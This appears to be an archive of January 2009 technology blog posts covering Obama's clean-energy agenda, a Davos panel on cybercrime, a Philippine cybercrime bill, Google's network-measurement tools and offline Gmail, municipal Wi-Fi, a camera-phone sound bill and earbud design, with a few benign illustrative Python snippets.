President Barack Obama with Transportation Secretary Ray LaHood and EPA Administrator Lisa Jackson
Environmentalists are encouraged by President Barack Obama's focus this week on renewable energy and stricter emissions standards, although some economists are skeptical he can pull the country out of the recession while cleaning up the planet.

Obama must strike a careful balance between stimulating the economy in the coming months and investing in the long-term future of the environment, said Raj Chetty, professor of economics at the University of California, Berkeley.
"If you spend money too quickly, you lose site of the long-term vision," Chetty told CNN. "If you focus too much on the long term, you may not act on spending money."
Framing his remarks with an eye on the recession, the president on Monday announced a plan for "a new energy economy that will build millions of jobs." Obama proposes to put 460,000 Americans to work through clean energy investments, increasing fuel efficiency in vehicles and reducing greenhouse gas emissions.
By 2025, the Obama administration hopes one-fourth of the nation's energy will come from renewable sources. Over the long term, the president hopes to create millions of new jobs by investing $150 billion in taxpayer money to help private companies develop new sources of clean energy, such as wind, solar and geothermal power.


It's about time, say scientists who often clashed with former President George W. Bush on environmental policy.

"By repowering our nation with clean energy, we will create millions of jobs that can't be sent overseas. By harnessing the energy of the sun and wind, we can refuel our nation and end our addiction to oil," said Wesley Warren, director of programs for the Natural Resources Defense Council.
Environmental scholars, however, say the changes Obama seeks are not easy.
"These technologies are not new. They have been around for 10 to 15 years," said Bill Chameides, dean of the Nicholas School of Environment at Duke University. "Government can push new policies, but it has to prove to be economically competitive or else it will not happen."
"It is going to require massive investments," said Joseph Romm, former acting assistant secretary of energy under the Clinton administration and senior fellow at the Center for American Progress. "The only question is, are we going to be the leader and export our technologies or a follower and continue importing our resources?"
Some economists question whether spending government money on new energy technologies is the best way to stimulate the economy in the short term.
Opponents of Obama's proposals say renewable energy would be expensive, take up large amounts of land, and might not even be able to generate sufficient energy given the aging infrastructure of the nation's electric grid.
"If the private sector will not invest in these technologies, it will not be efficient," said Alan Reynolds, senior fellow at the Cato Institute.
"Creating jobs by switching from one form of energy to another is a bad idea," he added. "You don't need subsidies for anything that is free. Getting a $7,000 rebate on a $100,000 plug-in electrical hybrid that gets its power from a coal plant doesn't make a lot of sense."
Several events in Washington this week underscored the Obama administration's commitment to environmental issues. Secretary of State Hillary Clinton on Monday named a special envoy to pursue global agreements combating global warming. On Wednesday, former Vice President Al Gore urged Congress to approve Obama's stimulus package and said the United States needs to join international talks on a climate-change treaty.
"For years our efforts to address the climate crisis have been undermined by the idea that we must chose between our planet and our way of life, between our moral duty and economic well-being these are false choices," Gore told the Senate Foreign Relations Committee.
"In fact, the solutions to the climate crisis are the same solutions that will address our economic and national crisis as well."
Obama may have science on his side. By overwhelming consensus, scientists agree that our warming planet poses a greater global threat with every passing day.
The replacement of current technology with energy generated from natural resources, such as sunlight and wind, could help reduce CO2 emissions by 50 percent by 2050, according to the International Energy Agency.
"Frankly the science is screaming at us," said Sen. John Kerry, chairman of the Senate Foreign Relations Committee, at Wednesday's hearing. "Carbon dioxide emissions grew at a rate of four times faster in the Bush administration than they did in the 1990s."
Even so, experts agree the faltering economy will complicate any discussion about investment in clean energy.
"The country is running two deficits," said David Orr, a professor of environmental studies and politics at Oberlin College, "the economy in the short term, which will take one to five years to figure out [and] the environment in the long term, which if we don't do anything about it will see catastrophic effects."

Cybercrime is rising sharply, experts warn at the World Economic Forum in Davos


Cybercrime threat rising sharply
The threat of cybercrime is rising sharply, experts have warned at the World Economic Forum in Davos.

They called for a new system to tackle well-organised gangs of cybercriminals.

Online theft costs $1 trillion a year, the number of attacks is rising sharply and too many people do not know how to protect themselves, they said.

The internet was vulnerable, they said, but as it was now part of society's central nervous system, attacks could threaten whole economies.

The past year had seen "more vulnerabilities, more cybercrime, more malicious software than ever before", more than had been seen in the past five years combined, one of the experts reported.

But does that really put "the internet at risk"? That was the topic of a session at the annual Davos meeting.

On the panel discussing the issue were Mozilla chairwoman Mitchell Baker (makers of the Firefox browser), McAfee chief executive Dave Dewalt, Harvard law professor and leading internet expert Jonathan Zittrain, Andre Kudelski of Kudelski group, which provides digital security solutions, and Tom Ilube, the boss of Garlik, a firm working on online web identity protection.

They were also joined by Microsoft's chief research officer, Craig Mundie.

To encourage frank debate, Davos rules do not allow the attribution of comments to individual panellists.

Threat #1: Crime

The experts on the panel outlined a wide range of threats facing the internet.
There was traditional cybercrime: committing fraud or theft by stealing somebody's identity, their credit card details and other data, or tricking them into paying for services or goods that do not exist.

The majority of these crimes, one participant said, were not being committed by a youngster sitting in a basement at their computer.

Rather, they were executed by very large and very well-organised criminal gangs.

One panellist described the case of a lawyer who had realised that he could make more money through cybercrime.

He went on to assemble a gang of about 300 people with specialised roles - computer experts, lawyers, people harvesting the data and so on.

Such criminals use viruses to take control of computers and combine thousands of them into so-called "botnets" that are used for concerted cyber attacks.

In the United States, a "virtual" group had managed to hijack and redirect the details of 25 million credit card transactions to Ukraine. The group used the data to buy a large number of goods, which were then sold on eBay.

This suggested organisation on a huge scale.

"This is not vandalism anymore, but organised criminality," a panellist said, while another added that "this is it is not about technology, but our economy".

Threat #2: the system

A much larger problem, though, is flaws in the set-up of the web itself.

It is organised around the principle of trust, which can have unexpected knock-on effects.

Nearly a year ago, Pakistan tried to ban a YouTube video that it deemed to be offensive to Islam.

The country's internet service providers (ISPs) were ordered to stop all YouTube traffic within Pakistan.
However, one ISP inadvertently managed to make YouTube inaccessible from anywhere in the world.

But in cyberspace, nobody is responsible for dealing with such incidents.

It fell to a loose group of volunteers to analyse the problem and distribute a patch globally within 90 minutes.

"Fortunately there was no Star Trek convention and they were all around," a panellist joked.

Threat #3: cyber warfare

Design flaws are one thing, cyber warfare is another.

Two years ago, a political dispute between Russia and Estonia escalated when the small Baltic country came under a sustained denial-of-service attack which disabled the country's banking industry and its utilities like the electricity network.
This was repeated last year, when Georgia's web infrastructure was brought to its knees during its conflict with Russia.

"2008 was the year when cyber warfare began.. it showed that you can bring down a country within minutes," one panellist said.

"It was like cyber riot, Russia started it and then many hackers jumped on the bandwagon," said another.

This threat was now getting even greater because of the "multiplication of web-enabled devices" - from cars to fridges, from environmental sensors to digital television networks.

The panel discussed methods that terrorists could use to attack or undermine the whole internet, and posed the question whether the web would be able to survive such an assault.

The real problem, concluded one of the experts, was not the individual loss.

It was the systemic risk, where fraud and attacks undermine either trust in or the functionality of the system, to the point where it becomes unusable.



What solution?

"The problems are daunting, and it's getting worse," said one of the experts. "Do we need a true disaster to bring people together?," asked another.

One panellist noted that unlike the real world - where we know whether a certain neighbourhood is safe or not - cyberspace was still too new for most of us to make such judgements. This uncertainty created fear.

And as "the internet is a global network, it doesn't obey traditional boundaries, and traditional ways of policing don't work," one expert said.

Comparing virus-infected computers to people carrying highly infectious diseases like Sars, he proposed the creation of a World Health Organisation for the internet.

"If you have a highly communicable disease, you don't have any civil liberties at that point. We quarantine people."

"We can identify the machines that have been co-opted, that provide the energy to botnets, but right now we have no way to sequester them."

But several panellists worried about the heavy hand of government. The internet's strength was its open nature. Centralising it would be a huge threat to innovation, evolution and growth of the web.

"The amount of control required [to exclude all risk] is quite totalitarian," one of them warned.

Instead they suggested fostering the civic spirit of the web, similar to the open source software movement and the team that had sorted the YouTube problem.

"Would a formalised internet police following protocols have been able to find the [internet service provider] in Pakistan as quickly and deployed a fix that quickly?" one of them asked.

How Soon Will Cybercrimes Be Punished?
In criminal law, there is no crime where there is no law punishing it. That explains why various crimes committed through the internet still persist today. Even when offenders are caught, court proceedings go poorly because only the part of the offense governed by the Revised Penal Code (RPC) can be litigated; the main bulk of the offense, the cybercrime itself, is usually left untouched. This is the main issue, and the current RPC is simply inadequate to deal with the matter. Hence, the government's highest monitoring body for the state of information technology in the Philippines is now pressing the legislature to pass a bill against cybercrimes.
The Commission on Information and Communication Technology (CICT) defines cybercrimes as offenses committed in the realm of the internet which, just like conventional offenses, have grave and concrete effects on those they target. The crimes identified are hacking, identity theft, phishing, spamming, website defacement, denial-of-service (DoS) attacks, malware or viruses, child pornography, and cyber prostitution. Such crimes are not yet punishable under the country's criminal law, which is why legislative action is needed to make each of these offenses a felony so that perpetrators can be punished in accordance with the law.
CICT is very hopeful that increased awareness and support will push the Congress to finally pass a bill against cybercrimes. The commission endorsed the "Cybercrime Prevention Act of 2008", in which four cyber-related bills authored by different lawmakers are consolidated. A representative from the Council of Europe also joined the technical working group in refining the bill a year prior to the endorsement; the representation is meant to "harmonize" the bill with European standards on cybersecurity. It has to be considered that such crimes are not confined to one nation but traverse territorial boundaries, given that they are committed on the World Wide Web.
Currently, CICT feels that there is increasing support from private sector groups. The Business Process Association of the Philippines (B/PAP), which represents the outsourcing industry, is an example. The umbrella organization supports the bill because it reasons that once the country is secured against different forms of cybercrime through existing and enforceable laws, it will be easier to sell the services performed in the country to foreign investors. The bill would ensure that clients are well covered when it comes to cybersecurity in the Philippines.
With all this, it can be said that the conditions the country currently faces call for progressive and up-to-date legislation. Neighboring countries like Singapore and Malaysia have already adopted such measures. Unluckily, though, the bill has been hampered by other, so-called "more important" matters discussed in both the Lower and Upper Houses of the Philippine Congress. Five years have passed since the bill was endorsed, yet Congress has still failed to act on it. As support and awareness regarding cybercrimes become more apparent, hopefully the legislature will finally address the issue.

Microsoft patent makes smart phones more like PCs


'Smart system' includes a cradle that allows a smart phone to connect to peripherals and networks through a USB connection.

Microsoft Corp. has patented smart phone-docking technology that would allow the devices to connect to peripherals and networks similar to the way PCs do.

According to a filing with the U.S. Patent and Trademark Office, Microsoft has patented a "smart system" that includes a smart-phone cradle that allows the device to interface to peripherals, networks and large video displays through a USB connection.


Some of the peripherals the cradle would allow the smart phone to link up to include printers, TV screens, cameras, external storage devices and speakers, according to the patent, which Microsoft acquired Jan. 22.

For years Microsoft executives -- particularly Chairman Bill Gates, who is no longer on full-time duty at the company -- have discussed publicly how PCs and smart devices are reaching an intersection, and how PC technology will be available in smaller devices.

The patent filing reflects this notion. "The cell phone is rapidly evolving into a smart communications device that can provide sufficient computing power and functionality to drive a wide variety of peripherals as well as access network services," according to the filing. "A major impediment to taking advantage of this evolving technology in the cell phone, for example, is the inability to connect the phone to peripheral devices and systems."

Apple Inc.'s iPhone, introduced in mid-2007, was probably the first and best example of the intersection between PCs and smart phones; it's more like a mini-PC than a mobile phone. With devices based on the Windows Mobile operating system that third parties sell, Microsoft also offers a similar hybrid of PC and smart phone.

Microsoft also released a Zune music and video player to compete with Apple's iPod, but the device has garnered only lukewarm customer interest, leaving the future of the product uncertain. Rumors swirled that Microsoft would unveil a combination Zune/Windows Mobile device to rival iPhone at the Consumer Electronics Show in Las Vegas earlier this month, but that did not happen.

Microsoft did not immediately comment on the patent Friday. The company doesn't typically comment on technologies it patents, which may or may not end up as products or as a part of products Microsoft sells.

Thursday, January 29, 2009

Google's new online tools will diagnose your network connection and performance

Google and a group of partners have released a set of tools designed to help broadband customers and researchers measure performance of Internet connections.
The set of tools, at MeasurementLab.net, includes a network diagnostic tool, a network path diagnostic tool and a tool to measure whether the user's broadband provider is slowing BitTorrent peer-to-peer (P-to-P) traffic. Coming soon to the M-Lab applications is a tool to determine whether a broadband provider is giving some traffic a lower priority than other traffic, and a tool to determine whether a provider is degrading certain users or applications.


Think your Internet Service Provider (ISP) is messing with your connection performance? Now you can find out, with Google's new online tools that will diagnose your network connection.
Here's a quick walkthrough on how to make the best of them.
Google's broadband test tools are located at MeasurementLab.net. On that page, you'll see an icon that says "Users: Test Your Internet Connection". Click that, and you'll be taken to a page with three tests available and two more listed as coming soon. Of the three available tests, however, only one is fully automated and easy to use.
Glasnost, second on the list, will check whether your ISP is slowing down (as Comcast has done) or blocking peer-to-peer (P2P) downloads from software such as BitTorrent. P2P apps are commonly used for downloading pirated software and media content like movies and music, but they are also used for legal purposes, such as distributing large software packages to many users at once.
To use the measurement tool, you will be redirected to the Glasnost site. You'll need the latest version of Java installed, and you should stop any large downloads that you may have running before you begin the test. If you're on a Mac, a popup message will prompt you to trust the site's Java applet.
When you're ready to start, you can choose whether you want to run a full test (approximately 7 minutes long) or a simple test (4 minutes long). When I tried to test my connection, Glasnost's measurement servers were overloaded and an alternative server was offered, but that was overloaded as well. After a short while I was able to run the test.
In the tests of my connection (my provider is Vodafone At Home, in the UK) all results indicated that BitTorrent traffic is not blocked or throttled. But I'm looking forward to hearing from you in the comments how your ISP performed in Glasnost's diagnostics. Meanwhile, make sure you keep an eye on the other tests that will be available soon from Measurementlab.net.
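For readers curious about what tools like Glasnost measure at a basic level, here is a minimal Python sketch of the underlying idea: compare the throughput of two kinds of traffic and look for a consistent gap. This is an illustration only, not how Glasnost is actually implemented, and the URLs are placeholders you would replace with real test endpoints.

import time
import urllib.request

def measure_throughput(url, max_bytes=1_000_000):
    """Download up to max_bytes and return throughput in kilobits per second."""
    start = time.time()
    received = 0
    with urllib.request.urlopen(url) as resp:
        while received < max_bytes:
            chunk = resp.read(65536)
            if not chunk:
                break
            received += len(chunk)
    return (received * 8 / 1000) / (time.time() - start)

# Hypothetical endpoints: one plain HTTP flow and one flow that mimics
# P2P traffic. A large, consistent gap between the two rates would hint
# at application-specific throttling by the ISP.
http_rate = measure_throughput("http://example.com/plain-http-testfile")
p2p_rate = measure_throughput("http://example.com/p2p-lookalike-flow")
print(f"HTTP: {http_rate:.0f} kbit/s, P2P-like: {p2p_rate:.0f} kbit/s")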

Wednesday, January 28, 2009

Britannica reaches out to the web



The Encyclopaedia Britannica has unveiled a plan to let readers help keep the reference work up to date.
Under the plan, readers and contributing experts will help expand and maintain entries online.
Experts will also be enrolled in a reward scheme and given help to promote their command of a subject.
However, Britannica said it would not follow Wikipedia in letting a wide range of people make contributions to its encyclopaedia.
User choice
"We are not abdicating our responsibility as publishers or burying it under the now-fashionable 'wisdom of the crowds'," wrote Jorge Cauz, president of Encyclopaedia Britannica in a blog entry about the changes.
He added: "We believe that the creation and documentation of knowledge is a collaborative process but not a democratic one."
Britannica plans to do more with the experts that have already made contributions. They will be encouraged to keep articles up to date and be given a chance to promote their own expertise.
Selected readers will also be invited to contribute and many readers will be able to use Britannica materials to create their own works that will be featured on the site.
However, it said these user-created works would sit alongside the encyclopaedia entries, and the official material would carry a "Britannica Checked" stamp to distinguish it from the user-generated content.
Alongside the move towards more openness will be a redesign of the Britannica site and the creation of web-based tools that visitors can use to put together their own reference materials.

Pharr, a city in Hidalgo County, Texas, is considering a $500,000 project that would blanket the city with a wireless Internet system


Pharr is considering a $500,000 project that would blanket the city with a wireless Internet system geared toward serving city workers and emergency responders.
Negotiations are still in extremely preliminary stages, and both the city and contractor say a timetable isn't set, but leaders are intrigued by the prospect of a system that can seemingly meet their wildest high-tech fantasies.
"The possibilities for the future are really interesting," Pharr City Manager Fred Sandoval said.
Bobby Vassallo, a wireless Internet consultant, has met with the City Commission twice over the last six weeks to help pitch the concept of a wireless Internet "clothesline" that could help the city handle everything from police video surveillance to wireless water meter-reading.
Behind the pitch is Brownsville businessman Oscar Garza, who leads the corporation Valley Wireless Internet Holdings.
Sandoval emphasized that the city hasn't made any decisions yet.
"It's a very interesting concept," he said. "We definitely want to be at the forefront."
REGION-WIDE
Pharr isn't alone in its consideration of wireless systems.
While wireless Internet is already the standard in some large cities, the technology now seems to be taking root in the Rio Grande Valley.
Cities across the region are pursuing high-tech, wireless Internet options that have the potential to promote efficiency in virtually all municipal departments by keeping workers in the field connected to City Hall.
Using wireless "mesh" systems, cities can provide Internet access over a large area to their employees through a series of nodes attached to structures like water towers or streetlights.
That means building inspectors could send reports back to City Hall from a work site, traffic citations could appear in court computers almost instantly, and police could set up surveillance cameras without fear of their cables being cut.
McAllen is already moving forward with plans to install up to 120 surveillance cameras throughout the city, which will be connected wirelessly to a fiber-optic cable running through the city.
The cameras would be served by a downtown wireless network, which could also provide support to other city workers in the area.
Last summer, a pilot program provided wireless to city workers in Bill Schupp Park. McAllen is currently soliciting proposals from vendors and is scheduled to meet with them today.
The focus of McAllen's project would be city usage, but eventually it could be opened up to residents, said Belinda Mercado, McAllen's information technology director.
Meanwhile, Hidalgo leaders are examining the possibility of creating a citywide blanket of wireless Internet similar to the one Pharr is examining. The system would provide access to emergency responders and residents on two separate networks, explained Rick Mendoza, Hidalgo's information technology director.
He said the talks are in preliminary stages and price estimates aren't available. But the city would like to offer Internet service to residents at no cost.
"We want to offer Internet service to members of our community who don't have the means of getting either DSL or cable," Mendoza said.
He added that a citywide wireless network would help Hidalgo compete with neighboring cities.
Edinburg leaders have also discussed the possibility of creating some sort of wireless system that would include various hot spots throughout the city, though they are only in discussions and the city hasn't started talks with any specific vendors.
Brownsville officials, meanwhile, expect their $6.6 million wireless project to be operational within four months, Mayor Pat Ahumada said.
The city is erecting signal towers, which will provide wireless access to city employees, utility workers and emergency responders, though it remains to be seen how much access the general public will have.
COST
The systems don't come cheap, however.
The network being pitched to Pharr could cost as much as $500,000 for the initial infrastructure, $25,000 a month to operate and even more for cameras, wireless water meters and other high-tech equipment needed to actually take advantage of the system.
At a time when cities across the region are struggling financially, at least some have questioned whether the cost of such an ambitious undertaking can be justified.
Pharr is just starting to climb out from under its financial woes after it wiped out its reserves last year.
"I believe the No. 1 question we should be asking, besides ‘Can we afford this?' is ‘Do we need it?'" said Pharr Finance Director Juan Guerra at a city workshop earlier this month. "From what I'm hearing ... I'm not sure if we do."
TIMING
Interestingly, the Valley's pursuit of wireless comes as cities elsewhere are struggling with their Wi-Fi projects.
Internet service provider Earthlink, which has partnered with Philadelphia, Houston and other large cities on wireless programs, announced layoffs within its municipal division in November. The company told shareholders it no longer makes sense for Earthlink to invest in municipal wireless.
As a result, some community wireless projects have been put on hiatus.
Earlier in the decade, companies like Earthlink offered to provide wireless systems at virtually no cost to cities. In exchange, the networks were privately owned, and the companies could charge subscription fees to consumers or hit them with advertising.
That model is changing, as it has become apparent that broadband access is becoming more readily available and affordable to consumers.
Today, cities are designing the systems for themselves to meet their own needs, such as giving support to emergency workers or keeping public works employees connected while in the field.
Those purpose-driven networks — as opposed to ones that are simply designed to give residents Internet access — are the ones that are now poised to succeed, writes Governing magazine's Christopher Swope, an expert on municipal wireless systems.
Vassallo, the wireless Internet consultant, emphasized to Pharr leaders that the city could create some public hot spots, but providing all-encompassing Internet service to residents isn't worth the cost or stress to the city.
Regardless of how, exactly, Pharr's and other cities' projects take shape, advocates say it's high time the Valley embraced wireless.

Tuesday, January 27, 2009

Google will begin to offer browser-based offline contact to its Gmail Webmail application

Google announced the release of a new system which allows users to access their accounts offline.
Google Delivers Offline Access for Gmail
Google will begin to offer browser-based offline access to its Gmail Webmail application, a much-awaited feature.
This functionality, which will allow people to use the Gmail interface when disconnected from the Internet, has been expected since mid-2007.
That's when Google introduced Gears, a browser plug-in designed to provide offline access to Web-hosted applications like Gmail.
Gears is currently used for offline access to several Web applications from Google, like the Reader RSS manager and the Docs word processor, and from other providers like Zoho, which uses it for offline access to its e-mail and word processing browser-based applications.
Rajen Sheth, senior product manager for Google Apps, said that applying Gears to Gmail has been a very complex task, primarily because of the high volume of messages accounts can store. "Gmail was a tough hurdle," he said.
Google ruled out the option of letting users replicate their entire Gmail inboxes to their PCs, which in many cases would translate into gigabytes of data flowing to people's hard drives. It instead developed algorithms that will automatically determine which messages should be downloaded to PCs, taking into consideration a variety of factors that reflect their level of importance to the user, he said. At this point, end-users will not be able to tweak these settings manually.
"We had to make it such that we're managing a sizable amount of information offline and doing it well in a way that's seamless to the end-user," he said.
For example, in Gmail, users can put labels on messages, as well as tag them with stars to indicate their importance, and Google can use that information to determine which messages to download. Sheth estimates that in most cases Gmail will download several thousand messages, preferring those that are more recent as well. Depending on the amount of messages users have on their accounts, they may get downloads going back two months or two years, he said.
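Google hasn't published its actual algorithm, but a toy sketch makes the idea concrete. The scoring weights below are invented purely for illustration; only the inputs (stars, labels, recency) come from Sheth's description.

from datetime import datetime

def message_score(msg, now):
    """Rough importance score from stars, labels, and recency (all weights assumed)."""
    score = 0.0
    if msg["starred"]:
        score += 10.0                           # starred mail is clearly important
    score += 2.0 * len(msg["labels"])           # labeled mail got user attention
    age_days = (now - msg["date"]).days
    score += max(0.0, 90.0 - age_days) / 9.0    # favor recent messages
    return score

def pick_messages_to_cache(messages, limit=2000):
    """Choose which messages to download for offline use."""
    now = datetime.now()
    ranked = sorted(messages, key=lambda m: message_score(m, now), reverse=True)
    return ranked[:limit]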
Google will begin to roll out the Gmail offline functionality Tuesday evening and expects to make it available to everybody in a few days, whether they use Gmail in its standalone version or as part of the Apps collaboration and communication suite for organizations.
While the feature was "rigorously" tested internally at Google, it is a first, early release upon which Google expects to iterate and improve. That's why it's being released under the Google Labs label. Users are encouraged to offer Google feedback.
Users have been able to manage their Gmail accounts offline via other methods for years, since Gmail supports the POP and IMAP protocols that let people download and send out messages using desktop e-mail software like Microsoft Outlook and others.
However, the Gears implementation will let people work within the Gmail interface without the need for a separate PC application. When offline, messages will be put in a Gears browser queue, and the desktop and online versions of the accounts will be synchronized automatically when users connect to the Internet again. This will come in handy for people who travel a lot and often find themselves without Internet access, Sheth said.
To activate the offline functionality, users of the standalone Gmail service and the standard Apps edition should click "Settings" after logging on to their Gmail account. There, they should click on the "Labs" tab, select "Enable" next to "Offline Gmail" and click "Save Changes." A new "Offline" link will then appear in the right-hand corner of the account interface. Users of the Education and Premier Apps versions will have to wait for their Apps administrators to enable Gmail Labs for everyone on the domain first.
Google is also rolling out Gears-based offline access for its Calendar application. However, it will be for now read-only and exclusively available to Google Apps account holders. Previously, Google introduced read-only offline access to the Spreadsheet and Presentation applications in Google Docs, which is also part of Google Apps.

more... on the release of offline Gmail

The early version of the app is available now to users with the U.S./U.K. English version of Google Labs.
Pegged as an "experimental" feature, the app is aimed at maintaining Gmail's functionality even when you're not online. Built on Google's Gears platform, the feature, once enabled, downloads a cache of your mail to your PC. When you're connected to the Web, it syncs the cache with the Gmail servers.
While you're offline, you can read, star, and label messages. If you send a message when you're offline, Gmail places it in your outbox and sends it as soon as you log back in. A special "flaky connection" setting splits the difference between on and offline modes ("when you're 'borrowing' your neighbor's wireless," says Google), utilizing a local cache while syncing it with the online version.
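The "outbox now, send later" behavior is a classic offline-queue pattern. Here is a small, self-contained Python sketch of that pattern; it is not Gears code, and every name in it is assumed, but it shows the mechanism the article describes.

import json
import os

QUEUE_FILE = "offline_queue.json"   # hypothetical local cache file

def load_queue():
    if not os.path.exists(QUEUE_FILE):
        return []
    with open(QUEUE_FILE) as f:
        return json.load(f)

def save_queue(queue):
    with open(QUEUE_FILE, "w") as f:
        json.dump(queue, f)

def queue_action(action):
    """Record an action (e.g. 'send message') performed while offline."""
    queue = load_queue()
    queue.append(action)
    save_queue(queue)

def sync(send_to_server):
    """Replay queued actions once connectivity returns."""
    remaining = []
    for action in load_queue():
        try:
            send_to_server(action)      # succeeds only when online
        except ConnectionError:
            remaining.append(action)    # still offline; retry next sync
    save_queue(remaining)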

"Camera Phone Predator Alert Act" to protect citizens from being photographed illegally, without us knowledge


Congress Intros Bill to Force Cell Camera Sounds
The Camera Phone Predator Alert Act (H.R. 414) is the real deal. Fresh off the legislative desk of New York Representative Peter King (R), the bill--currently cosponsored by goose egg--would require an audible tone to accompany all cellular phones with an installed camera that are created in the U.S. This tone, likely a clicking noise of some sort, would sound, "within a reasonable radius of the phone whenever a photograph is taken with the camera in such phone." And don't think that evildoers would be able to conceal their predatory ways by flicking an iPhone-style audio toggle switch. Any mobile phones built after the bill becomes a law would be prohibited from including any way to eliminate or reduce the volume of said noise.
Camera Click Sound to be Legal Requirement
The draft of the legislation also specifies that the click sound should be audible within a "reasonable" distance.
The US is reportedly readying the "Camera Phone Predator Alert Act" to protect citizens from being photographed illegally, without their knowledge. While the topic has been mulled over for years, it is only now that the country is planning to put forward legislation making the camera click sound audible whenever a picture is taken. Some cell phone manufacturers already have compliant devices in place; on others, simply putting the phone into silent mode lets voyeuristic photography go undetected. Even on phones whose camera click sound cannot be turned off, users have been able to hack the phone's firmware and remove the sound. The proposed bill would fall under the domain of the Consumer Product Safety Commission and is expected to be given the status of a "safety requirement." Additionally, the draft of the legislation specifies that the click sound should be audible within a "reasonable" distance. Similar laws are already in place in countries like Japan and Korea, and most device manufacturers have been able to comply with them.


Micro Camcorder - 'World's Smallest'
Things are getting ever smaller. If you doubt this, just check out the Micro Camcorder, a spy camera developed by Spy Gadget. The camcorder has claimed the title of 'World's Smallest Camcorder'.

The camcorder is so small that it can be hidden in a chewing-gum pack. It has a one-touch record function and records video at 15 fps (frames per second). Captured video is stored on a microSD flash card. It has built-in batteries, charges via USB, and can record more than 30 hours of video with a 1GB card installed. The quoted price is USD 295 (Rs. 11,800).


Monday, January 26, 2009

The world's coolest earbuds

Skullcandy veered away from standard-issue black and white headphones - and struck gold.
Skullcandy is using fake alligator skin and rhinestones to shake up the headphone market, giving Philips and Sony a run for their money.

The half pipe tucked in a corner of the office is the first clue that Skullcandy is not your average company.
Other clues: In the teeth of the worst recession in generations, the five-year-old private company is growing like a weed. And it just scored a round of funding, from private-equity shop Goode Partners, at a time when investment dollars are scarce.
If the name Skullcandy doesn't register, it will with your kids (so will the term half pipe, which is a ramp, in this case for skateboarding, shaped like a pipe cut in half lengthwise).
Skullcandy's business is headphones, and it dominates the 12- to 25-year-old demographic with a lineup of gear covered in faux gator skin, gold foil, rhinestones and hip-hop-inspired graphics. Pull back the hoody on any kid riding a snowboard in Park City, Utah, and chances are pretty good that a pair of Skullcandy headphones, probably the top-selling "Smokin' Buds," will be pumping music into their ears.
Making electronics cool
From a distant No. 10 three years ago, Skullcandy is now North America's third-largest manufacturer of headphones by unit sales, behind consumer electronics giants Philips Electronics (PHG) and Sony (SNE), according to NPD Group. "We'll be No. 2 soon," predicted Skullcandy president Jeremy Andrus, legs dangling from the office half pipe. "My guess is some time next year."
After that, Skullcandy and the band of snowboarders, skaters, surfers and DJs that founder Rick Alden has assembled in Park City, will be gunning for No. 1. That is, if Alden, the CEO and creative madman to Andrus' operations guru, can figure out a way to do it without diluting the company's cool factor.
Skullcandy didn't invent headphones; what the company has done is make them into a fashion item. Kids don't want one pair, they want five. "We're like sunglasses," Alden said. "Except we sit on top of your head, and you wear them a lot more."
Skullcandy headphones are not the type you will hear audiophiles gushing about. They are mostly solid-sounding pieces of affordable gear that, unlike Sony's grey and black headphones, or Apple's white, don't disappear into the background. On the contrary, they make a statement. The snowboard, surf and skate inspired graphics and colors ask for attention, and speak to a lifestyle, or in most cases, a wannabe lifestyle.
Successful clothing brands are able to evoke that lifestyle magic, but it is the rare consumer electronics company that does it. Apple (AAPL, Fortune 500) with its iPod is the obvious and most successful current example. Skullcandy has pulled it off so far, and in doing so sent revenue from essentially zero to approaching $100 million in just a few years. Sales more than doubled in 2008.
To put Skullcandy's momentum in perspective: when many consumer electronics companies saw sales fall off a cliff in November, Skullcandy's quadrupled year over year, according to Andrus.
That success is obviously gratifying to Alden, but it also has him worried about overexposure. "I was at the mountain riding with my son the other day, and everyone I saw was wearing Skullcandy headphones, I mean they were everywhere," Alden said. "I may go back to wearing black Sonys just to be different."
He's kidding, but his concern is real. Alden and his design team need to keep Skullcandy fresh, so it doesn't fall out of fashion and black becomes the new black. Fortunately the Skullcandy team has a secret weapon when they seek inspiration, design-wise and business-wise.
"We head to the mountain," Alden said, checking for the latest snowfall report on his laptop. "No good ideas ever come from sitting in an office, not around here at least."

more...

The Potential of Earbuds
There is great disagreement about:
Whether earbuds could potentially sound good, given their small size.
Whether any actual earbuds sound good, or whether the whole idea needs further development.
Which earbuds sound good and which sound bad.
Which of the expensive ($40-$80) earbuds sound so good that the extra cost is justified.

After testing many headphones and earbuds and applying my extensive experience tweaking equalizers, I think that earbuds actually have the potential to sound even *better* than standard headphones. In any case, all headphones and earbuds need a new approach: a calibrated equalization curve built into the player, to yield flat response. Megabass is a step toward such a compensation curve.
Like the Etymotics, earbuds have the potential to have smoother response than even the best popular standard headphones, such as the Sennheiser 580's. I've dialed in some truly vibrant, open sound using equalization together with $10 earbuds. It is easy and straightforward to equalize earbuds; just do anti-rolloff to a greater or lesser degree, and leave the rest flat; there aren't mysterious jags hidden along the entire spectrum that need unique shapes of compensation. I'd rather trust my ears than the common assumption that earbuds are inferior. If the conditions are right and the appropriate, ordinary EQ compensations are made, earbuds can be superior, rather than inferior, to good standard headphones. It's simply a matter of starting with a decent earbud driver, and providing the inverse of the earbud driver's frequency response.
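To make the inverse-response idea concrete, here is a small numeric sketch in Python. The measured response values are invented for illustration; in practice you would substitute a real measurement of your earbud driver.

measured_response = {   # frequency in Hz -> assumed driver output in dB
    60: -9.0,           # bass rolloff, the usual earbud weakness
    120: -5.0,
    250: -2.0,
    1000: 0.0,          # reference point
    4000: 1.0,
    10000: -1.5,
}

def inverse_eq(response, max_boost_db=12.0):
    """EQ curve that flattens the response: negate it, clamped to a safe boost."""
    return {f: max(-max_boost_db, min(max_boost_db, -db))
            for f, db in response.items()}

for freq, gain in sorted(inverse_eq(measured_response).items()):
    print(f"{freq:>6} Hz: {gain:+.1f} dB")

The clamp matters in practice: a driver with a steep rolloff would otherwise demand a huge boost that small earbud drivers cannot deliver without distortion.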
If someone shows me a measured response curve of an earbud and it's rough and jagged, I will change my view somewhat, but in any case, I think that eq-compensated earbuds at least *can sound* unusually smooth and natural. Players need more fancy curves to compensate for specific earbud models.
"Though I like the R3 stock earbuds even better than the 888's, I can't stop seeking for even better sound, as I believe it can be a lot better. If I press against an earbud I get very powerful bass, so it is possible. I will keep on looking, and if I find something interesting I will let you know. Please let me know your findings on this matter." (from a private email to me)
Some people haven't been lucky and haven't heard the one or two models that are really good. No wonder they think earbuds are a poor packaging and sound poor. I was starting to suspect that *some* Sony stock earbuds (included with the player) sound great, and some sound lousy.

Internet Explorer 8 Focuses on Better Security and Privacy

Some of the features of Release Candidate 1, now available to the public, are similar to functionality that's already included in Firefox 3.
